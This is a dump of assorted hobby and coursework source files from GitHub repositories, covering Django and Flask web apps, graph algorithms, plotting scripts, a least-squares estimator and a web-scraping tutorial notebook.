{"seq_id":"72608673401","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models import CASCADE, Sum\nfrom django.urls import reverse\n\n\nclass Achievement(models.Model):\n    name = models.CharField(max_length=20)\n    description = models.TextField()\n    image = models.ImageField(default=None)\n\n\nclass Employee(User):\n    user = models.ForeignKey(User, on_delete=CASCADE, related_name='+')\n    achievements = models.ManyToManyField(Achievement, blank=True)\n\n\nclass Dish(models.Model):\n    name = models.CharField(max_length=20)\n    description = models.TextField()\n    price = models.DecimalField(max_digits=5, decimal_places=2)\n\n    class Meta:\n        verbose_name_plural = 'Dishes'\n\n    def __str__(self):\n        return self.name\n\n\nclass Order(models.Model):\n    table = models.IntegerField()\n    employee = models.ForeignKey(User, on_delete=CASCADE)\n    tip = models.IntegerField(default=0)\n    paid_amount = models.IntegerField(default=0)\n    dishes = models.ManyToManyField(Dish, related_name='order_dishes')\n    date = models.DateField(auto_now_add=True)\n    is_open = models.BooleanField(default=True)\n\n    def __str__(self):\n        return f'Order for table no. 
{self.table}'\n\n    def get_absolute_url(self):\n        return reverse('order_detail', args=[str(self.id)])\n\n    def get_full_price(self):\n        try:\n            full_price = Order.objects.get(pk=self.pk).dishes.aggregate(Sum('price'))['price__sum']\n        except Order.DoesNotExist:\n            full_price = None\n        return full_price\n\n    def save(self, force_insert=False, force_update=False, using=None,\n             update_fields=None, *args, **kwargs):\n        try:\n            self.tip = self.paid_amount - self.get_full_price()\n        except TypeError:\n            self.tip = 0\n        super(Order, self).save(*args, **kwargs)\n","repo_name":"Cieszk/Restaurant-App","sub_path":"arepo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18446681299","text":"from code_challenges.trees.trees import BinaryTree,Node\nfrom code_challenges.hashmap_tree_intersection.hashmap_tree_intersection import tree_intersection\n\ndef test_empty_tree():\n    tree1=BinaryTree()\n    tree2=BinaryTree()\n    actual=tree_intersection(tree1,tree2)\n    expect=None\n    assert actual== expect\n\n\n\ndef test_one_tree():\n    bt = BinaryTree()\n    bt1 = BinaryTree()\n    bt1.root = Node(\"12\")\n    bt1.root.right = Node(\"100\")\n    bt1.root.left = Node(\"200\")\n    bt1.root.left.left = Node(\"100\")\n    bt1.root.left.right = Node(\"50\")\n    bt1.root.right.left = Node(\"60\")\n    assert None == tree_intersection(bt, bt1)\n\n\ndef test_common_values():\n    bt = BinaryTree()\n    bt1 = BinaryTree()\n    bt.root = Node(\"100\")\n    bt.root.right = Node(\"20\")\n    bt.root.left = Node(\"50\")\n    bt.root.left.left = Node(\"5\")\n    bt.root.left.right = Node(\"15\")\n    bt1.root = Node(\"20\")\n    bt1.root.right = Node(\"150\")\n    bt1.root.left = Node(\"100\")\n    bt1.root.left.left = Node(\"5\")\n    bt1.root.left.right = Node(\"6\")\n    bt1.root.right.left = Node(\"7\")\n    assert ['20','100','5'] == tree_intersection(bt, bt1)\n","repo_name":"sarazwairi/data-structures-and-algorithms","sub_path":"python/code_challenges/hashmap_tree_intersection/test_hashmap_tree_intersection.py","file_name":"test_hashmap_tree_intersection.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13416601970","text":"import sys\n\n\nclass Vertex:\n    def __init__(self, key):\n        self.id = key\n        self.edges = []\n        self.degree = 0\n\n    def __repr__(self):\n        return str(self.id)\n\n    def __eq__(self, other):\n        if not isinstance(other, Vertex):\n            return False\n        else:\n            return self.id == other.id\n\n    def __lt__(self, other):\n        return self.id < other.id\n\n    def reset_edges(self):\n        self.edges = []\n        self.degree = 0\n\n\nclass Graph:\n    def __init__(self, V, E):\n        self.V = V\n        self.E = E\n        self.load_edges()\n\n    def load_edges(self):\n        for v in self.V:\n            self.V[v].reset_edges()\n\n        for edge in self.E:\n            edge[0].edges.append(edge[1])\n            edge[0].degree += 1\n\n    def get_vertices(self):\n        return self.V.values()\n\n    def get_edges(self):\n        return self.E\n\n\ndef read_in_file(filename):\n    V = {}\n    E = []\n    new_lines = []\n    with open(filename, 'r') as f:\n        lines = f.readlines()\n        for i in range(len(lines)):\n            new_lines.append(lines[i].strip().split(sep=' '))\n\n    for line in new_lines:\n        if line[0] not in V:\n            V[line[0]] = Vertex(int(line[0]))\n        if line[1] not in V:\n            V[line[1]] = Vertex(int(line[1]))\n        E.append([V[line[0]], V[line[1]]])\n        E.append([V[line[1]], V[line[0]]])\n    E.sort()\n    return Graph(V, E)\n\n\ndef smart_greedy_VC(G: Graph):\n    C = []\n    H = Graph(G.V.copy(), G.E.copy())\n\n    while 
H.get_edges() != []:\n        max_degree = 0\n        v = None\n        for vert in H.get_vertices():\n            if vert.degree > max_degree:\n                max_degree = vert.degree\n                v = vert.id\n\n        new_V = {}\n        for vert in H.get_vertices():\n            if vert.id != v:\n                new_V[str(vert.id)] = vert\n\n        new_E = []\n        for e in H.get_edges():\n            if H.V[str(v)] not in e:\n                new_E.append(e)\n\n        H = Graph(new_V, new_E)\n        C.append(v)\n    return C\n\n\ndef basic_greedy_VC(G: Graph):\n    C = []\n    H = Graph(G.V.copy(), G.E.copy())\n\n    while H.get_edges() != []:\n        (u, v) = H.get_edges()[0]\n\n        new_E = []\n        for e in H.get_edges():\n            if u not in e and v not in e:\n                new_E.append(e)\n\n        new_V = {}\n        for vert in H.get_vertices():\n            for e in new_E:\n                if (vert == e[0] or vert == e[1]) and str(vert.id) not in new_V:\n                    new_V[str(vert.id)] = vert\n\n        H = Graph(new_V, new_E)\n        C.append(u)\n        C.append(v)\n    return C\n\n\ndef VC_checker(G: Graph, C):\n    covered = []\n    for e in G.get_edges():\n        for v in C:\n            if v in e and e not in covered:\n                covered.append(e)\n\n    return len(covered) == len(G.get_edges())\n\n\ndef get_subsets(V, n):\n    if n == 0:\n        return [[]]\n\n    subsets = []\n    for i in range(len(V)):\n        cur = V[i]\n        rest = V[i+1:]\n        rest_subsets = get_subsets(rest, n-1)\n\n        for v in rest_subsets:\n            subsets.append([cur, *v])\n\n    return subsets\n\n\ndef brute_force_VC(G: Graph):\n    for i in range(1, len(G.get_vertices())):\n        subsets = get_subsets(list(G.get_vertices()), i)\n        for s in subsets:\n            if VC_checker(G, s):\n                return s\n\n\ndef save_output(out, sg, bg, bf):\n    with open('my' + out + '.txt', 'w') as f:\n        f.write(\"log-Approximation: %s\" % ' '.join([str(v) for v in sg])+\"\\n\")\n        f.write(\"2-Approximation: %s\" % ' '.join([str(v) for v in bg])+\"\\n\")\n        f.write(\"Exact Solution: %s\" % ' '.join([str(v) for v in bf]))\n\n\ndef main(argv):\n    G = read_in_file(argv[1])\n    sg = smart_greedy_VC(G)\n    bg = basic_greedy_VC(G)\n    bf = brute_force_VC(G)\n    save_output(argv[1][-5], sg, bg, bf)\n    print(\"log-Approximation: %s\" % ' '.join([str(v) for v in sg]))\n    print(\"2-Approximation: %s\" % ' '.join([str(v) for v in bg]))\n    print(\"Exact Solution: %s\" % ' '.join([str(v) for v in bf]))\n\n\nif __name__ == '__main__':\n    main(sys.argv)\n    # main([0, 'in1.txt', 'my1.txt'])\n","repo_name":"Wander03/CSC349","sub_path":"asgn4/vertex_cover.py","file_name":"vertex_cover.py","file_ext":"py","file_size_in_byte":4096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7262890569","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport yaml\nimport sys\n\nargs = sys.argv\nif (len(args) != 6):\n    print(\"usage: python3 scripts/plot.py WORKLOAD NCPU LOGSIZE FORK_NUM REPEAT_NUM\")\n    exit(1)\n\nnprocs = ['100', '5000', '15000']\npolicies = ['default', 'multiple']\nworkload = args[1]\nncpu = args[2]\nlogsize = args[3]\nforknum = args[4]\nrepeatnum = args[5]\n\nif (workload == \"largewrite\"):\n    forknum = ''\n\nx1 = [1, 2, 3]\nx2 = [1.3, 2.3, 3.3]\n\ncategory = [\"time_turnaround\", \"cpu_usage\", \"runtime\", \"balancing\", \"counters\", \"time_response\"]\n# index = [\"average\", \"average\", \"standard\", \"standard\", \"contextswitch\"]\nytitle = [\"turnaround time [clock]\", \"cpu usage [%]\", \"std of cpu time per cpu\", \\\n    \"std of cpu occupancy per process\", \"number of context switch\", \"response time [clock]\"]\n\nfor i in range(len(category)):\n    y = {}\n\n    for policy in policies:\n        values = []\n        for nproc in nprocs:\n            with open('log/' + workload + '/' + policy + '_cpu' + ncpu + '_nproc' + nproc + \\\n                '_fork' + forknum + 
'_logsize' + logsize + '/' + 'summary.yaml') as file:\n                obj = yaml.safe_load(file)\n                values.append(obj[category[i]][\"average\"])\n        y[policy] = values\n\n    fig, ax = plt.subplots()\n    ax.set_xlabel('size of ptable')\n    ax.set_ylabel(ytitle[i])\n\n    plt.bar(x1, y[\"default\"], color='#BF616A', width=0.25, label='round robin', align=\"center\")\n    plt.bar(x2, y[\"multiple\"], color='#5E81AC', width=0.25, label='multiple runqueue', align=\"center\")\n    plt.legend(loc='center left', bbox_to_anchor=(1., .5), title=\"scheduling policy\")\n\n    plt.xticks([1.15, 2.15, 3.15], nprocs)\n    plt.savefig(\"fig/\" + workload + \"/\" + category[i] + \".png\", bbox_inches=\"tight\")\n","repo_name":"wkb8s/b4_research","sub_path":"scripts/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35023765953","text":"from django.urls import path\n\nfrom .views import article_list, ArticleDetailView, ArticleCommentView, article_likes, ArticleSearchView\n\n\n# app_name='article' tells Django that this urls.py module belongs to the article app; the technique is called a view-function namespace.\n# The name attribute gives each view an alias, but another app in the project may reuse the same name; setting app_name scopes these names and avoids such clashes.\n\napp_name = 'article'\nurlpatterns = [\n\n    # Article list\n    path('', article_list, name='article_list'),\n\n    # Article detail (content)\n    path(r'detail-.html', ArticleDetailView.as_view(), name='article_detail'),\n\n    # Article likes\n    path(r'/likes/', article_likes, name='article_likes'),\n\n    # Article comments\n    path(r'/comments/', ArticleCommentView.as_view(), name='article_comments'),\n\n    # Article search\n    path('search/', ArticleSearchView(), name='search'), # our SearchView defines a __call__ method, so an instance can be used directly as the view\n\n]\n","repo_name":"juehuan182/QmpythonBlog","sub_path":"article/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"12370692227","text":"#!/usr/bin/env python\n\n\"Setuptools params\"\n\nfrom setuptools import setup, find_packages\nfrom os.path import join\n\nscripts = [ join( 'bin', filename ) for filename in [ \n    'mn', 'mnexec' ] ]\n\nmodname = distname = 'mininet'\n\nsetup(\n    name=distname,\n    version='0.0.0',\n    description='Process-based OpenFlow emulator',\n    author='Bob Lantz',\n    author_email='rlantz@cs.stanford.edu',\n    packages=find_packages(exclude='test'),\n    long_description=\"\"\"\nInsert longer description here.\n    \"\"\",\n    classifiers=[\n        \"License :: OSI Approved :: GNU General Public License (GPL)\",\n        \"Programming Language :: Python\",\n        \"Development Status :: 4 - Beta\",\n        \"Intended Audience :: Developers\",\n        \"Topic :: Internet\",\n    ],\n    keywords='networking protocol Internet OpenFlow',\n    license='unspecified',\n    install_requires=[\n        'setuptools',\n        'networkx'\n    ],\n    scripts=scripts,\n)\n","repo_name":"nikhilh/mininet-rt","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"4490025186","text":"import re\n\nlist_detect_regex = re.compile(r\"(?<=\\[).*(?=\\])\")\nlist_split_regex = re.compile(r\"\\s*,\\s*\")\n\ndef get_par(inp: str, par: str, typ = int):\n    regex = re.compile(par + r\"\\s*=\\s*(?P<val>.*)\\s*;\")\n    res = regex.search(inp).group(\"val\")\n    list_res = list_detect_regex.search(res)\n    if list_res:\n        vals_str = list_res.group(0)\n        print(vals_str)\n        value_list = list_split_regex.split(vals_str)\n        return list(map(typ, value_list))\n    return 
typ(res)","repo_name":"tudyoctav/IDMP-Constrained-Shortest-Path","sub_path":"sat/model/parse_dzn.py","file_name":"parse_dzn.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"8334279910","text":"import numpy as np\r\nfrom numpy.linalg import inv\r\nimport matplotlib.pyplot as plt\r\n\r\nI = np.array([[0.2, 0.3, 0.4, 0.5, 0.6]]).T\r\nV = np.array([[1.23, 1.38, 2.06, 2.47, 3.17]]).T\r\n\r\nplt.scatter(I, V)\r\nplt.xlabel('Current (A)')\r\nplt.ylabel('Voltage (V)')\r\nplt.grid(True)\r\nplt.show()\r\n\r\n## Batch Solution\r\n\r\nH = np.ones((5, 2))\r\nH[:, 0] = I.ravel()\r\nprint(H)\r\nx_ls = inv(H.T.dot(H)).dot(H.T.dot(V))\r\nprint('The slope and offset parameters of the best-fit line (i.e., the resistance and offset) are [R, b]:')\r\nprint(x_ls[0, 0])\r\nprint(x_ls[1, 0])\r\n\r\n# Plot line.\r\nI_line = np.arange(0, 0.8, 0.1).reshape(8, 1)\r\nV_line = x_ls[0]*I_line + x_ls[1]\r\n\r\nplt.scatter(I, V)\r\nplt.plot(I_line, V_line)\r\nplt.xlabel('Current (A)')\r\nplt.ylabel('Voltage (V)')\r\nplt.grid(True)\r\nplt.show()\r\n\r\n## Recursive Solution\r\n\r\n# Initialize the 2x1 parameter vector x (i.e., x_0).\r\nx_k = np.array([[4.6 , 0]]).T\r\n\r\n#print(x_k)\r\n\r\n#Initialize the 2x2 covaraince matrix (i.e. P_0). Off-diangonal elements should be zero.\r\nP_k = np.array([[9 , 0],[0, 0.2]])\r\n#print(\"P_k is\", P_k)\r\n# Our voltage measurement variance (denoted by R, don't confuse with resistance).\r\nR_k = np.array([[0.0225]])\r\n\r\n# Pre allocate space to save our estimates at every step.\r\nnum_meas = I.shape[0]\r\nprint(\"num_meas is\", num_meas)\r\nx_hist = np.zeros((num_meas + 1, 2)) \r\nP_hist = np.zeros((num_meas + 1, 2, 2))\r\n\r\nx_hist[0] = x_k.T #what to do here\r\nx_hist_t = np.zeros((2,1))\r\n#print(\"x_hist is\", x_hist)\r\nP_hist[0] = P_k\r\nId = np.identity(2)\r\n\r\n# Iterate over all the available measurements.\r\nfor k in range(num_meas):\r\n # Construct H_k (Jacobian).\r\n H_k = np.matrix(H[k]) #np.array does't work with .T \r\n #print(\"the value of k is\", k)\r\n #print(\"H_k trans is\", H_k.T)\r\n #print(\"P_hist[k-1] is\", P_hist[k-1])\r\n # Construct K_k (gain matrix).\r\n K_k = P_hist[k].dot(H_k.T)\r\n print(\"K_k is\", K_k) \r\n # Update our estimate.\r\n #print(\"new x_hist\", k, \"is\", x_hist[k])\r\n x_hist_t[0][0] = x_hist[k][0]\r\n x_hist_t[1][0] = x_hist[k][1]\r\n print(\"new x_hist_t is\", x_hist_t)\r\n x_k = x_hist_t + K_k.dot(V[k]-H_k.dot(x_hist_t))\r\n print(\"new x_k is\", x_k)\r\n # Update our uncertainty (covariance)\r\n P_k = (Id - K_k.dot(H_k)).dot(P_hist[k]).dot((Id - K_k.dot(H_k)).T) + K_k.dot(R_k).dot(K_k.T) \r\n print(\"new P_k is\", P_k) \r\n\r\n # Keep track of our history.\r\n P_hist[k + 1] = P_k\r\n x_hist[k + 1] = x_k.T\r\n \r\nprint('The slope and offset parameters of the best-fit line (i.e., the resistance and offset) are [R, b]:')\r\nprint(x_k)\r\nprint(x_k[0, 0])\r\nprint(x_k[1, 0])\r\n\r\nplt.scatter(I, V, label='Data')\r\nplt.plot(I_line, V_line, label='Batch Solution')\r\nplt.xlabel('Current (A)')\r\nplt.ylabel('Voltage (V)')\r\nplt.grid(True)\r\n\r\nI_line = np.arange(0, 0.8, 0.1).reshape(8, 1)\r\n\r\nfor k in range(num_meas):\r\n V_line = x_hist[k, 0]*I_line + x_hist[k, 1]\r\n plt.plot(I_line, V_line, label='Measurement {}'.format(k))\r\n\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#signbed by Rishabh 
Singh","repo_name":"rish2911/Self-Driving-Cars-by-U-Toronto","sub_path":"recursive_least_squares.py","file_name":"recursive_least_squares.py","file_ext":"py","file_size_in_byte":2979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34296642746","text":"\"\"\"\n\nDesigned and Developed by-\nUdayraj Deshmukh \nhttps://github.com/Udayraj123\n\n\"\"\"\nimport glob\nfrom PIL import Image\nin_dir = '../../outputs/checkedOMRs/'\nim1 = Image.open(\"inputs/gif/gif_start.jpg\")\nGAP = 200 #ms\nfor suffix1 in [\"JE/\",\"HE/\",\"JH/\",\"HH/\"]:\n\tfor suffix2 in [\"\",\"_MULTI_\",\"_BADSCAN_\"]:\n\t\tdir_glob =in_dir+suffix1 + suffix2+'/*.jpg'\n\t\tallOMRs= list(glob.iglob(dir_glob))\n\t\tif(len(allOMRs)):\n\t\t\tfilename = \"outputs/gif/checking_\"+suffix1[:-1] + suffix2+\".gif\"\n\t\t\tim1.save(filename, save_all=True, append_images=[Image.open(filepath) for filepath in allOMRs], duration=GAP*(2 if len(suffix2) else 1), loop=0)\n\t\t\tprint(\"Saved : \"+filename)\n\t\t# else:\n\t\t# \tprint(\"Empty glob: \"+dir_glob)\n","repo_name":"kapitsa2811/OMRChecker","sub_path":"extras/mini_scripts/make_gif.py","file_name":"make_gif.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"1480200259","text":"# coding=utf-8\nimport json\nfrom django.contrib import auth\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, HttpResponseBadRequest\nfrom django.shortcuts import render\nfrom django.template.context_processors import csrf\nfrom django.views.generic import CreateView\nfrom jsonify.convert import jsonify\nimport simplejson\nfrom myapp.form import UserCreationForm\n\nfrom myapp.models import Message\n\n\n@login_required\ndef index(request):\n mes = Message.objects.all()\n context = {\n 'messages': mes,\n }\n return render(request, 'myapp/home.html', context)\n\n\ndef login(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/')\n args = {}\n args.update(csrf(request))\n args['username'] = auth.get_user(request).username\n if request.POST:\n username = request.POST.get('username', '')\n password = request.POST.get('password', '')\n user = auth.authenticate(username=username, password=password)\n if user is not None:\n auth.login(request, user)\n return HttpResponseRedirect('/')\n else:\n args['login_error'] = u\"Пользователь не найден\"\n return render(request, 'myapp/login.html', args)\n else:\n return render(request, 'myapp/login.html', args)\n\n\ndef registr(request):\n args = {}\n args.update(csrf(request))\n args['form'] = UserCreationForm()\n if request.POST:\n newuser_form = UserCreationForm(request.POST)\n if newuser_form.is_valid():\n newuser_form.save()\n user = auth.authenticate(username=newuser_form.cleaned_data['username'],\n password=newuser_form.cleaned_data['password2'])\n auth.login(request, user)\n return redirect('/')\n else:\n args['login_error'] = \"Заполните все поля\"\n args['form'] = newuser_form\n return render(request, 'myapp/register.html', args)\n return render(request, 'myapp/register.html', args)\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n\n\nclass Register(CreateView):\n form_class = UserCreationForm\n template_name = 
'myapp/register.html'\n\n    success_url = reverse_lazy('login')\n\n\ndef send_message(request):\n    if request.method == \"POST\":\n        q = request.POST.get('message', '')\n        if q is not None:\n            new = Message.objects.create(message=q, sender=request.user)\n            new.save()\n    return HttpResponse('')\n\n\ndef receive(request):\n    args = []\n    if request.method == \"POST\":\n        post = request.POST.get('offset', '')\n        mes = Message.objects.filter(pk__gt=post).order_by('pk')\n        for i in mes:\n            args.append({'id': i.id,\n                         'message': i.message,\n                         'sender': i.sender.username\n                         })\n\n        arr = dict([('result', args)])\n        #print(arr['result'])\n        return HttpResponse(json.dumps(arr), content_type=\"application/json\")\n\n\ndef sync(request):\n    args = {}\n    m = Message.objects.order_by('-pk')\n    if m:\n        args['lmid'] = m[0].id\n    else:\n        args['lmid'] = 0\n    return HttpResponse(json.dumps(args))\n","repo_name":"EugeniyMalakhov/Ajax-chat","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17686519672","text":"class Solution:\n    def maxProfit(self, prices):\n        prev_pointer = 0\n        curr_pointer = 1\n        max_profit = 0\n        for i in range(len(prices)-1):\n            if prices[prev_pointer] < prices[curr_pointer]:\n                max_profit = max(max_profit, prices[curr_pointer] - prices[prev_pointer])\n            else:\n                prev_pointer = curr_pointer\n            curr_pointer += 1\n        return max_profit"} +{"text":"def helper(input_seq, word_dict, dp, index):\r\n    length_seq = len(input_seq)\r\n    if index >= len(input_seq):\r\n        return True\r\n    if input_seq[index] in word_dict.keys():\r\n        for i in word_dict[input_seq[index]]:\r\n            fail = False\r\n            for j in range(len(i)):\r\n                if index + len(i) < length_seq:\r\n                    if input_seq[index + j] != i[j]:\r\n                        fail = True\r\n                        break\r\n                else:\r\n                    fail = True\r\n                    break\r\n            if not fail:\r\n                if helper(input_seq, word_dict, dp, index + j + 1):\r\n                    return True\r\n    return False\r\n\r\ndef word_break(input_seq, words):\r\n    word_dict = {}\r\n    dp = {}\r\n    for i in range(len(words)):\r\n        if words[i][0] in word_dict.keys():\r\n            word_dict[words[i][0]].append(words[i])\r\n        else:\r\n            word_dict[words[i][0]] = [words[i]]\r\n    return helper(input_seq, word_dict, dp, 0)\r\ninput_string =\"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab\"\r\nword = [\"a\",\"aa\",\"aaa\",\"aaaa\",\"aaaaa\",\"aaaaaa\",\"aaaaaaa\",\"aaaaaaaa\",\"aaaaaaaaa\",\"aaaaaaaaaa\"]\r\nprint(word_break(input_string, word))\r\n#print(word_break(\"catsandog\", [\"cats\", \"dog\", \"sand\", \"and\", \"cat\",\"og\"]))","repo_name":"raymoss/Algorithms","sub_path":"word_break_139.py","file_name":"word_break_139.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25999539559","text":"import dis\n\ndef f(l, b):\n    counter = 0\n    x = 0\n    while counter < 3:\n        x = x + l\n        x = x + b\n        counter += 1\n    return x\n\n# def f2(m):\n#     import turtle\n#     turle.forward(55)\ndef bitcode():\n    print(dis.dis(f))\nprint(dis.dis(bitcode))","repo_name":"sidshastry/firstrepo","sub_path":"pyplay/disasm.py","file_name":"disasm.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1286818851","text":"from pyglet.gl import *\nfrom pyglet import image\nimport ctypes\nimport matplotlib\nfrom PIL import Image\n\n\nclass Texture:\n    def __init__(self, path, type=\"path\"):\n        self.texture = path if type == \"image\" else Image.open(path).transpose(Image.FLIP_TOP_BOTTOM)\n        if self.texture.mode == \"RGB\":\n            self.texture.putalpha(255)\n        self.texture_id = ctypes.c_uint32()\n        
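# The GL calls that follow allocate one texture name, bind it, select linear min/mag filtering, upload the RGBA bytes, and finally unbind the texture.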
glGenTextures(1, self.texture_id)\n glBindTexture(GL_TEXTURE_2D, self.texture_id)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER,\n GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER,\n GL_LINEAR)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA8, self.texture.width,\n self.texture.height, 0, GL_RGBA, GL_UNSIGNED_BYTE, self.texture.tobytes())\n glBindTexture(GL_TEXTURE_2D, 0)\n\n def clean_up(self):\n glDeleteTextures(1, self.texture_id)","repo_name":"SupreetTadeparti/TerrainGeneration","sub_path":"texture.py","file_name":"texture.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"22473436543","text":"# 3rd-party packages\r\nfrom flask import Flask, render_template, request, redirect, url_for\r\nfrom flask_mongoengine import MongoEngine\r\nfrom flask_login import (\r\n LoginManager,\r\n current_user,\r\n login_user,\r\n logout_user,\r\n login_required,\r\n)\r\nfrom flask_bcrypt import Bcrypt\r\nfrom werkzeug.utils import secure_filename\r\n\r\nfrom flask_talisman import Talisman\r\n\r\n# stdlib\r\nfrom datetime import datetime\r\nimport os\r\n\r\n\r\n\r\n\r\ndb = MongoEngine()\r\nlogin_manager = LoginManager()\r\nbcrypt = Bcrypt()\r\n\r\n\r\n\r\nfrom .users.routes import users\r\nfrom .store.routes import store\r\n\r\n\r\ndef page_not_found(e):\r\n return render_template(\"404.html\"), 404\r\n\r\n\r\n\r\n\r\ndef create_app(test_config=None):\r\n app = Flask(__name__)\r\n \r\n\r\n app.config[\"SECRET_KEY\"] = b'\\x020;yr\\x91\\x11\\xbe\"\\x9d\\xc1\\x14\\x91\\xadf\\xec'\r\n app.config[\"MONGODB_HOST\"] = os.getenv(\"MONGODB_HOST\")\r\n\r\n db.init_app(app)\r\n login_manager.init_app(app)\r\n bcrypt.init_app(app)\r\n\r\n app.register_blueprint(users)\r\n app.register_error_handler(404, page_not_found)\r\n\r\n app.register_blueprint(store)\r\n app.register_error_handler(404, page_not_found)\r\n\r\n login_manager.login_view = \"users.login\"\r\n\r\n\r\n csp = {\r\n 'default-src': '\\'self\\'',\r\n 'img-src': ['*.fakestoreapi.com', '*.pngimage.net'],\r\n 'script-src': ['*', \"'unsafe-inline'\"],\r\n 'style-src': ['*', \"'unsafe-inline'\"]\r\n }\r\n \r\n Talisman(app, content_security_policy=csp)\r\n\r\n\r\n return app\r\n","repo_name":"ishand2000/cmsc388J-ecommerce-website","sub_path":"flask_app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39114583390","text":"# To add a new cell, type '#%%'\n# To add a new markdown cell, type '#%% [markdown]'\n\n#%% [markdown]\n# # Web scraping\n#\n# Our goal here is to learn\n# * Basic HTML structure\n# * Basic CSS structure and selector rules\n# * Basic webpage inspection tools from browsers\n# * Use of BeautifulSoup or other web scraping libraries, plus parsers\n\n#%%\nimport numpy as np\nimport pandas as pd\n# import matplotlib.pyplot as plt\n# plt.style.use('classic')\n\n#%%\n# We can use Python library \"requests\" to download the html file (via a GET request to the web server). 
\nimport requests\n# You can get a list of attributes and methods for the python requests object from w3schools — very handy\n# https://www.w3schools.com/python/ref_requests_response.asp\n\n\n#%%\nmyportfolio = ( 'MSFT', 'AAPL', 'GOOG' )\nurl = 'https://money.cnn.com/quote/quote.html?symb=MSFT' # we aim to loop thru our portfolio later when things are working\nthispage = requests.get(url)\nprint(thispage)\n# a response object, where status_code [200] means successful. It could be a blank page or error page, however...\nprint(thispage.status_code)\n# a status code starting with a 2 generally indicates success, and a code starting with a 4 or a 5 indicates an error.\n\n#%%\n# To get the html body (and head) from the response object, we can use\nprint(thispage.content)\n# The results typically should be like this\n# b'\\n ...\n# The starting 'b' character indicates it's in bytes, whereas \nprint(thispage.text)\n# will be in unicode\n\n# These are what you would see from \"downloading\" or \"inspecting\" a webpage in chrome/firefox/safari/etc.\n# Try that.\n\n#%%\n# Next step is to use some kind of parser to parse the HTML code into a standard tree-like or object-like structure (HTML DOM Document-Object-Model)\n\n# Useful to have basic HTML knowledge, the (XML) structure\n\n# CSS (Cascading Style Sheets) is also an integral part of most HTML design these days.\n\n# Most parsers can use CSS-style selectors, as well as Xpaths\n\n#%%\n# We will use the library BeautifulSoup with the default parser lxml. Another common one is the scrapy library.\n# Need to install for the first time:\n# pip install bs4\n# or pip3 install bs4\n# Beautiful Soup also relies on a parser, the default is lxml. \n# You may already have it. \n# If not, do: $ pip install lxml or $ apt-get install python-lxml.\n# We can also use html.parser, or html5lib\nfrom bs4 import BeautifulSoup\n\n#%%\n# soup = BeautifulSoup(thispage.content, 'lxml')\n# soup = BeautifulSoup(thispage.content, 'html.parser')\nsoup = BeautifulSoup(thispage.content, 'html5lib')\n\n#%%\nprint(soup.prettify())\n\n#%% \n# What is the structure of soup?\nsoupkids = list(soup.children)\nprint(len(soupkids)) # length of 3 if html.parser is used, or 2 if lxml or html5lib is used.\n# soupkids = ['HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"', '\\n', ...\n\n# Use list comprehension to see what is in the list\n[type(item) for item in soupkids]\n\n#%%\nprint(soupkids[0]) # HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\n#%%\nprint(soupkids[1]) # the actual html document that we really care about\n\n#%%\nthecontent = soupkids[1] # the html code itself\n\n#%%\n# break this object (bs4.element.Tag) up further\nthehtml = list(thecontent.children)\nprint(len(thehtml)) # length of 3 \n# thehtml = [ <head> <title> ..., '\\n' , <body> ... ]\n\n# Use list comprehension to see what is in the list\n[type(item) for item in thehtml]\n\n#%%\n# For our purpose, we want the info inside the body\nthebody = thehtml[2]\n\n#%%\n# break this object (bs4.element.Tag) up 